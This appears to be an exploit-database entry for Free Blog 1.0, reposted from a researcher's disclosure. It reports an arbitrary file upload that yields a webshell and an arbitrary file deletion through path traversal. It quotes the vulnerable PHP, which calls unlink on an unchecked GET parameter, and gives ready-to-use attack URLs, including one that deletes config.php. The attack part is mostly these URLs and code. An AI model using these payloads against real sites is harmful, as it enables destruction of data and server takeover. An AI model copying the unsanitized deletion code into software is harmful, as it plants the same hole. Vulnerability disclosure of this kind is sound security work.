Free Blog 1.0 Multiple Vulnerability

2013.01.09
Credit: cr4wl3r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Free Blog 1.0 Multiple Vulnerability # By cr4wl3r http://bastardlabs.info # http://bastardlabs.info/exploits/Free_Blog.txt # Software Link: http://blog.sdnex.com/ # Tested: Ubuntu 12.04.1 LTS Proof of concept: Arbitrary File Upload Vulnerability http://bastardlabs/blog_path/up.php Shell will be available here http://bastardlabs/blog_path/log/images/shell.php Arbitrary File Deletion Vulnerability ---------- 49 <?php 50 if($_GET['del']){ 51 $id=$_GET['del']; 52 unlink("./log/images/$id"); 53 } 54 ?> ---------- http://bastardlabs/blog_path/up.php?del=../../[file] http://bastardlabs/blog_path/up.php?del=../../config.php ------------------------------ My sweetheart http://www.photoshow.com/watch/rx9IX5ZS

References:

http://www.photoshow.com/watch/rx9IX5ZS


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top